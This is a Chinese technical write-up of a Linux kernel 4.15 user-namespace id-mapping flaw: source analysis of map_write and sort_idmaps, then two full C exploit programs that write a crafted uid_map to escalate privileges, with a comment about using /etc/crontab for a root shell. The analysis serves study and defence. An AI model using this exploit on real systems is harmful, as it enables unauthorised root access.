簡介
這是名稱空間的漏洞,文章先介紹user namespaces的簡單只是,然后從補丁入手,分析源碼,找到漏洞出現的原因。因為對這塊的源碼不是那么熟悉,所以着重描述源碼分析的部分,其他可以參考末尾的鏈接
本文出現的代碼都基於linux-4.15.4
namespace
linux中有實現名稱空間,用來隔離不同的資源,實現原理就是將原本是全局的變量放到各個namespaces之中去。
user namespaces
linux中user namespaces的man說明:overview of Linux user namespaces
user namespaces是linux中用來隔離與安全相關的標志符和屬性的名稱空間,主要包括UID、GID、根目錄、秘鑰和capacity。在名稱空間中,user namespaces可以實現進程和名稱空間中有不同的uid和gid,比如名稱空間中可以有root權限而在真實系統中沒有。
在上面的main說明中可以看到兩個proc文件: /proc/<pid>/uid_map 和 /proc/<pid>/gid_map。向這個文件寫入值可以用來將系統中的uid或gid映射到namespaces中去。其中:
- 第一個字段ID-inside-ns表示在容器顯示的UID或GID,
- 第二個字段ID-outside-ns表示容器外映射的真實的UID或GID。
- 第三個字段表示映射的范圍,一般填1,表示一一對應。
比如,把真實的uid=1000映射成容器內的uid=0
$
cat
/proc/2465/uid_map
0 1000 1
- 寫這兩個文件的進程需要這個namespace中的CAP_SETUID (CAP_SETGID)權限(可參看Capabilities)
- 寫入的進程必須是此user namespace的父或子的user namespace進程。
- 另外需要滿如下條件之一:1)父進程將effective uid/gid映射到子進程的user namespace中,2)父進程如果有CAP_SETUID/CAP_SETGID權限,那么它將可以映射到父進程中的任一uid/gid。
補丁分析
這個漏洞的修補在這里,問題出在kernel/user_namespace.c中的map_write之中:
diff --git a/kernel/user_namespace.c b/kernel/user_namespace.c index e5222b5..923414a 100644 --- a/kernel/user_namespace.c +++ b/kernel/user_namespace.c @@ -974,10 +974,6 @@ static ssize_t map_write(struct file *file, const char __user *buf, if (!new_idmap_permitted(file, ns, cap_setid, &new_map)) goto out; - ret = sort_idmaps(&new_map); - if (ret < 0) - goto out; - ret = -EPERM; /* Map the lower ids from the parent user namespace to the * kernel global id space. @@ -1004,6 +1000,14 @@ static ssize_t map_write(struct file *file, const char __user *buf, e->lower_first = lower_first; } + /* + * If we want to use binary search for lookup, this clones the extent + * array and sorts both copies. + */ + ret = sort_idmaps(&new_map); + if (ret < 0) + goto out; + /* Install the map */ if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) { memcpy(map->extent, new_map.extent,
只是調換了幾行代碼的位置,先不着急,分析一下這個函數。
在understand中,找出這個函數的調用流程圖:
然后去看看調用map_write的函數proc_uid_map_write,函數原型:
ssize_t proc_uid_map_write(struct file *file, const char __user *buf, size_t size, loff_t *ppos)
參數很像文件描述符的寫操作函數,在尋找源碼中和該函數相關的操作,發現在fs/proc/base.c之中有這樣一個結構用到了proc_uid_map_write:
static const struct file_operations proc_uid_map_operations = { .open = proc_uid_map_open, .write = proc_uid_map_write, .read = seq_read, .llseek = seq_lseek, .release = proc_id_map_release, };
確認是文件的操作,接着在這個文件中,還有下面的代碼
REG("uid_map", S_IRUGO|S_IWUSR, proc_uid_map_operations)
所以,推測這就是 /proc/<pid>/uid_map文件寫操作的實現
源代碼分析
接着回到漏洞源代碼,開始分析,先從proc_uid_map_write函數開始,也就是文件寫操作的第一個函數
ssize_t proc_uid_map_write(struct file *file, const char __user *buf, size_t size, loff_t *ppos) { struct seq_file *seq = file->private_data; struct user_namespace *ns = seq->private; struct user_namespace *seq_ns = seq_user_ns(seq); if (!ns->parent) return -EPERM; if ((seq_ns != ns) && (seq_ns != ns->parent)) return -EPERM; return map_write(file, buf, size, ppos, CAP_SETUID, &ns->uid_map, &ns->parent->uid_map); }
看到只是做了兩個檢查,然后調用了map_write函數,而map_write函數的后兩個參數分別為名稱空間的uid_map和父名稱空間的uid_map(由名稱空間的知識可以知道,名稱空間的新建是需要clone處新進程,傳入特定參數來創建新的名稱空間)
看看這些個map的定義,看到uid_gid_extent的定義正好是符合 /proc/<pid>/uid_map等的文件格式,而且在user_naspace的man手冊中寫道,這些文件一次能寫入多個值,在Linux中4.14之前,這個極限被(任意地)設為5行。從Linux 4.15,限制是340行。這樣下面這兩個結構就不難理解了,當數據行數在5之內的時候,直接寫在extent里面,當大於5的時候,放在forward指向的位置:
#define UID_GID_MAP_MAX_BASE_EXTENTS 5
#define UID_GID_MAP_MAX_EXTENTS 340
struct uid_gid_extent { u32 first; u32 lower_first; u32 count; }; struct uid_gid_map { /* 64 bytes -- 1 cache line */ u32 nr_extents; union { struct uid_gid_extent extent[UID_GID_MAP_MAX_BASE_EXTENTS]; struct { struct uid_gid_extent *forward; struct uid_gid_extent *reverse; }; }; };
看map_write的源碼的第一部分,比較好理解了,capacity相關的含義對照man手冊中的解釋,除去幾個參數判斷的位置,比較重要的就是kbuf這塊內存,調用了memdup_user_nul函數先在內核中分配了一塊內存,然后將用戶態寫入的數據復制到內核之中,最后這塊內存由kbuf指向
struct seq_file *seq = file->private_data; struct user_namespace *ns = seq->private; struct uid_gid_map new_map; unsigned idx; struct uid_gid_extent extent; char *kbuf = NULL, *pos, *next_line; ssize_t ret = -EINVAL; memset(&new_map, 0, sizeof(struct uid_gid_map)); ret = -EPERM; /* Only allow one successful write to the map */ if (map->nr_extents != 0) goto out; /* * Adjusting namespace settings requires capabilities on the target. */ if (cap_valid(cap_setid) && !file_ns_capable(file, ns, CAP_SYS_ADMIN)) goto out; /* Only allow < page size writes at the beginning of the file */ ret = -EINVAL; if ((*ppos != 0) || (count >= PAGE_SIZE)) goto out; /* Slurp in the user data */ //從用戶空間復制寫入的數據到kbuf kbuf = memdup_user_nul(buf, count); if (IS_ERR(kbuf)) { ret = PTR_ERR(kbuf); kbuf = NULL; goto out; } /* Parse the user data */ ret = -EINVAL; pos = kbuf;
接着看,有一個大循環,不斷的按行解析出用戶輸入數據,存放進extent中,然后調用了兩個比較關鍵的函數,mappings_overlap和insert_extent,mappings_overlap用來檢測uid_gid_extent和uid_gid_map有沒有重疊的部分,有返回true,insert_extent用來向uid_gid_map中插入一個uid_gid_extent。
for (; pos; pos = next_line) { /* Find the end of line and ensure I don't look past it */ next_line = strchr(pos, '\n'); if (next_line) { *next_line = '\0'; next_line++; if (*next_line == '\0') next_line = NULL; } pos = skip_spaces(pos); extent.first = simple_strtoul(pos, &pos, 10); if (!isspace(*pos)) goto out; pos = skip_spaces(pos); extent.lower_first = simple_strtoul(pos, &pos, 10); if (!isspace(*pos)) goto out; pos = skip_spaces(pos); extent.count = simple_strtoul(pos, &pos, 10); if (*pos && !isspace(*pos)) goto out; /* Verify there is not trailing junk on the line */ pos = skip_spaces(pos); if (*pos != '\0') goto out; /* Verify we have been given valid starting values */ if ((extent.first == (u32) -1) || (extent.lower_first == (u32) -1)) goto out; /* Verify count is not zero and does not cause the * extent to wrap */ if ((extent.first + extent.count) <= extent.first) goto out; if ((extent.lower_first + extent.count) <= extent.lower_first) goto out; /* Do the ranges in extent overlap any previous extents? */ if (mappings_overlap(&new_map, &extent)) goto out; if ((new_map.nr_extents + 1) == UID_GID_MAP_MAX_EXTENTS && (next_line != NULL)) goto out; ret = insert_extent(&new_map, &extent); if (ret < 0) goto out; ret = -EINVAL; }
看看這上面說到的兩個關鍵函數的實現,mappings_overlap函數中,遍歷uid_gid_map,取出每個uid_gid_extent,然后和extent進行比較,包括區間的上界和下屆,同時可以看到當nr_extent大於5的時候,會指向forword指向的uid_gid_extent
static bool mappings_overlap(struct uid_gid_map *new_map, struct uid_gid_extent *extent) { u32 upper_first, lower_first, upper_last, lower_last; unsigned idx; upper_first = extent->first; lower_first = extent->lower_first; upper_last = upper_first + extent->count - 1; lower_last = lower_first + extent->count - 1; for (idx = 0; idx < new_map->nr_extents; idx++) { u32 prev_upper_first, prev_lower_first; u32 prev_upper_last, prev_lower_last; struct uid_gid_extent *prev; if (new_map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) prev = &new_map->extent[idx]; else prev = &new_map->forward[idx]; prev_upper_first = prev->first; prev_lower_first = prev->lower_first; prev_upper_last = prev_upper_first + prev->count - 1; prev_lower_last = prev_lower_first + prev->count - 1; /* Does the upper range intersect a previous extent? */ if ((prev_upper_first <= upper_last) && (prev_upper_last >= upper_first)) return true; /* Does the lower range intersect a previous extent? */ if ((prev_lower_first <= lower_last) && (prev_lower_last >= lower_first)) return true; } return false; }
好了,接着看insert_extent函數,可以看出一個大的if條件,當插入操作進行到末尾的時候,會分配一塊340的內存,然后將拷貝的目的地址設置為forward指向的位置,接着nr_extent增加
static int insert_extent(struct uid_gid_map *map, struct uid_gid_extent *extent) { struct uid_gid_extent *dest; if (map->nr_extents == UID_GID_MAP_MAX_BASE_EXTENTS) { struct uid_gid_extent *forward; /* Allocate memory for 340 mappings. */ forward = kmalloc(sizeof(struct uid_gid_extent) * UID_GID_MAP_MAX_EXTENTS, GFP_KERNEL); if (!forward) return -ENOMEM; /* Copy over memory. Only set up memory for the forward pointer. * Defer the memory setup for the reverse pointer. */ memcpy(forward, map->extent, map->nr_extents * sizeof(map->extent[0])); map->forward = forward; map->reverse = NULL; } if (map->nr_extents < UID_GID_MAP_MAX_BASE_EXTENTS) dest = &map->extent[map->nr_extents]; else dest = &map->forward[map->nr_extents]; *dest = *extent; map->nr_extents++; return 0; }
下面回到map_write函數,之前的操作都是用來復制輸入數據,做一些檢查工作,最終的輸入數據被放在了new_map中,new_idmap_permitted就不看了,可以對照usernamespaces的capacity來進行理解,接下來的函數是sort_idmaps函數
if (new_map.nr_extents == 0) goto out; ret = -EPERM; /* Validate the user is allowed to use user id's mapped to. */ if (!new_idmap_permitted(file, ns, cap_setid, &new_map)) goto out; ret = sort_idmaps(&new_map); if (ret < 0) goto out;
sort_idmaps函數,這是一個排序函數,並且只有當只排序大於5的部分,同時kmemdup函數還復制了一份,進行了你想排序,將結果放在reverse處,從上面的函數能考到這個值被初始化為NULL
static int sort_idmaps(struct uid_gid_map *map) { if (map->nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) return 0; /* Sort forward array. */ sort(map->forward, map->nr_extents, sizeof(struct uid_gid_extent), cmp_extents_forward, NULL); /* Only copy the memory from forward we actually need. */ map->reverse = kmemdup(map->forward, map->nr_extents * sizeof(struct uid_gid_extent), GFP_KERNEL); if (!map->reverse) return -ENOMEM; /* Sort reverse array. */ sort(map->reverse, map->nr_extents, sizeof(struct uid_gid_extent), cmp_extents_reverse, NULL); return 0; }
然后從map_write函數,遍歷了輸入數據,調用了map_id_range_down函數,這個函數的參數1是map_write接受的參數表示父名稱空間的uid_gid_map,參數23表示寫入數據的第23項,也就是映射父名稱空間的其實位置和范圍
/* Map the lower ids from the parent user namespace to the * kernel global id space. */ for (idx = 0; idx < new_map.nr_extents; idx++) { struct uid_gid_extent *e; u32 lower_first; if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) e = &new_map.extent[idx]; else e = &new_map.forward[idx]; lower_first = map_id_range_down(parent_map, e->lower_first, e->count); /* Fail if we can not map the specified extent to * the kernel global id space. */ if (lower_first == (u32) -1) goto out; e->lower_first = lower_first; }
好,接着看map_id_range_down
static u32 map_id_range_down(struct uid_gid_map *map, u32 id, u32 count) { struct uid_gid_extent *extent; unsigned extents = map->nr_extents; smp_rmb(); if (extents <= UID_GID_MAP_MAX_BASE_EXTENTS) extent = map_id_range_down_base(extents, map, id, count); else extent = map_id_range_down_max(extents, map, id, count); /* Map the id or note failure */ if (extent) id = (id - extent->first) + extent->lower_first; else id = (u32) -1; return id; }
直接調用的map_id_range_down_max,是一個二分搜索的封裝,回顧用戶輸入數據,第2個參數表示要映射的父名稱空間的起始位置,這個函數使用二分搜索,在父名稱空間中找一個uid_gid_extent,而這個uid_gid_extent的[first,first+count-1]包含了子名稱空間想映射的區間。
/** * map_id_range_down_max - Find idmap via binary search in ordered idmap array. * Can only be called if number of mappings exceeds UID_GID_MAP_MAX_BASE_EXTENTS. */ static struct uid_gid_extent * map_id_range_down_max(unsigned extents, struct uid_gid_map *map, u32 id, u32 count) { struct idmap_key key; key.map_up = false; key.count = count; key.id = id; return bsearch(&key, map->forward, extents, sizeof(struct uid_gid_extent), cmp_map_id); }
回到map_id_range_down函數,取得這個uid_gid_extent之后,利用這個uid_gid_extent區更新了id並且返回,向前看,可以知道這個id是子名稱空間中uid_gid_extent的lower_first字段,也就是想映射的父名稱空間的起始位置。下面這句話將id的值更新位父名稱空間的父名稱空間的位置,由於所有的名稱空間都是由一個根名稱空間,一步一步嵌套下來,所以這和值最終代表的是整個系統中的uid值。
id = (id - extent->first) + extent->lower_first;
最后,回到map_write函數中,for循環的最后利用下面的語句更新了new_map中對應uid_gid_extent的lower_first字段
e->lower_first = lower_first;
map_write還剩下最后一部分,這部分就類似於寫回,map_write傳入了一個參數為map,從proc_uid_map_write函數可以知道這是當前名稱空間的uid_gid_map,new_map是新建的,這部分的工作就是將new_map寫回到map中(這個proc文件只能被寫入一次,並且初始的時候是空的)。最后做了一些錯誤處理。
/* Install the map */ if (new_map.nr_extents <= UID_GID_MAP_MAX_BASE_EXTENTS) { memcpy(map->extent, new_map.extent, new_map.nr_extents * sizeof(new_map.extent[0])); } else { map->forward = new_map.forward; map->reverse = new_map.reverse; } smp_wmb(); map->nr_extents = new_map.nr_extents; *ppos = count; ret = count; out: if (ret < 0 && new_map.nr_extents > UID_GID_MAP_MAX_BASE_EXTENTS) { kfree(new_map.forward); kfree(new_map.reverse); map->forward = NULL; map->reverse = NULL; map->nr_extents = 0; } mutex_unlock(&userns_state_mutex); kfree(kbuf); return ret;
漏洞分析
前面的sort_idmaps函數中,可以看到當數據數目大於5的時候,還創建了一個reverse的副本,然后進行了排序,然后就沒有更改過了,最后將這個內存地址賦值給了map。
來看看兩個排序方式的區別
static int cmp_extents_forward(const void *a, const void *b) { const struct uid_gid_extent *e1 = a; const struct uid_gid_extent *e2 = b; if (e1->first < e2->first) return -1; if (e1->first > e2->first) return 1; return 0; } /* cmp function to sort() reverse mappings */ static int cmp_extents_reverse(const void *a, const void *b) { const struct uid_gid_extent *e1 = a; const struct uid_gid_extent *e2 = b; if (e1->lower_first < e2->lower_first) return -1; if (e1->lower_first > e2->lower_first) return 1; return 0; }
forward是用uid_gid_map中uid_gid_extent的first字段來進行排序,而reverse是利用lower_first字段進行排序
在前面調用map_id_range_down的for循環中,更新了e->lower_first的值,而e是通過forward來找到的,所以說最終只是更新了forward中的值,而reverse中的值沒有被更改,所以說這個reverse中的值是用戶傳進來的,如果先有一個名稱空間n1,映射自己的root進程到kernel的普通進程,然后n1再創建一個名稱空間n2,而將n1的root權限映射到n2的root權限,這樣在n2中的uid_map中,forword指向的uid_gid_extent的第2項被更改了,但是forword指向的沒有被更改,還保持root到root的映射,所以通過這個reverse來判斷的uid就會出現權限提升了。
然后就是這個reverse的鏈表到底在哪里被用到,並且是用來干嘛的?
根據作者的介紹,在user_namespaces中對reverse這個變量的引用,可以知道直接利用的函數在from_kuid()中,被kuid_has_mapping()判斷是否被映射,后者接着又被類似於inode_owner_or_capable()
和
privileged_wrt_inode_uidgid()
這樣的權限檢查函數所使用。就是說,內核在獲取這個進程的實際權限的時候,需要使用reverse。假設這樣一個場景,當一個容器中的進程訪問文件的時候,需要判斷該進程是不是有權限,當文件是在名稱空間之內的時候,則需要查看進程在容器內的權限,所以要通過內核的pid去找到進程的pid。
利用代碼
最后附上漏洞利用的代碼,第一部分是subuid_shell.c,這是一個普通的unshare函數來創建一個新的名空間,主要流程如下:
1、父進程fork子進程,之后子進程等待,父進程調用unshare創建一個新的名稱空間
2、父進程創建新的名稱空間后等待,子進程寫入uid_map等文件,設立映射條件
3、子進程等待,父進程調用sh
#define _GNU_SOURCE #include <err.h> #include <fcntl.h> #include <grp.h> #include <sched.h> #include <signal.h> #include <stdio.h> #include <stdlib.h> #include <sys/prctl.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <unistd.h> int main(void) { int sync_pipe[2]; char dummy; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe"); pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { // kill child if parent dies prctl(PR_SET_PDEATHSIG, SIGKILL); close(sync_pipe[1]); // create new ns if (unshare(CLONE_NEWUSER)) err(1, "unshare userns"); if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock"); if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock"); // set uid and gid to 0, in child ns if (setgid(0)) err(1, "setgid"); if (setuid(0)) err(1, "setuid"); // replace process with bash shell, in which you will see "root", // as the setuid(0) call worked // this might seem a little confusing, but you are "root" only to this child ns, // thus, no permission to the outside ns execl("/bin/bash", "bash", NULL); err(1, "exec"); } close(sync_pipe[0]); if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock"); // set id mapping (0..1000) for child process char cmd[1000]; sprintf(cmd, "echo deny > /proc/%d/setgroups", (int)child); if (system(cmd)) errx(1, "denying setgroups failed"); sprintf(cmd, "newuidmap %d 0 100000 1000", (int)child); if (system(cmd)) errx(1, "newuidmap failed"); sprintf(cmd, "newgidmap %d 0 100000 1000", (int)child); if (system(cmd)) errx(1, "newgidmap failed"); if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock"); int status; if (wait(&status) != child) err(1, "wait"); return 0; }
然后是subshell.c函數,主要流程同上,只是子進程寫入映射的數據不同,為什么是這些數據可以參考前面的漏洞分析部分
#define _GNU_SOURCE #include <err.h> #include <fcntl.h> #include <grp.h> #include <sched.h> #include <stdio.h> #include <sys/socket.h> #include <sys/un.h> #include <sys/wait.h> #include <unistd.h> int main(void) { int sync_pipe[2]; char dummy; if (socketpair(AF_UNIX, SOCK_STREAM, 0, sync_pipe)) err(1, "pipe"); // create a child process pid_t child = fork(); if (child == -1) err(1, "fork"); if (child == 0) { // in child process close(sync_pipe[1]); // this creates a new ns if (unshare(CLONE_NEWUSER)) err(1, "unshare userns"); if (write(sync_pipe[0], "X", 1) != 1) err(1, "write to sock"); if (read(sync_pipe[0], &dummy, 1) != 1) err(1, "read from sock"); // start a bash process (replace process image) // this time you are actually root, without the name/id, though // technically the root access is not complete, // to get complete root, write to /etc/crontab and wait for a root shell to pop up execl("/bin/bash", "bash", NULL); err(1, "exec"); } close(sync_pipe[0]); if (read(sync_pipe[1], &dummy, 1) != 1) err(1, "read from sock"); char pbuf[100]; // path of uid_map sprintf(pbuf, "/proc/%d", (int)child); // cd to /proc/pid/uid_map if (chdir(pbuf)) err(1, "chdir"); // our new id mapping with 6 extents (> 5 extents) const char* id_mapping = "0 0 1\n1 1 1\n2 2 1\n3 3 1\n4 4 1\n5 5 995\n"; // write the new mapping to uid_map and gid_map int uid_map = open("uid_map", O_WRONLY); if (uid_map == -1) err(1, "open uid map"); if (write(uid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write uid map"); close(uid_map); int gid_map = open("gid_map", O_WRONLY); if (gid_map == -1) err(1, "open gid map"); if (write(gid_map, id_mapping, strlen(id_mapping)) != strlen(id_mapping)) err(1, "write gid map"); close(gid_map); if (write(sync_pipe[1], "X", 1) != 1) err(1, "write to sock"); int status; if (wait(&status) != child) err(1, "wait"); return 0; }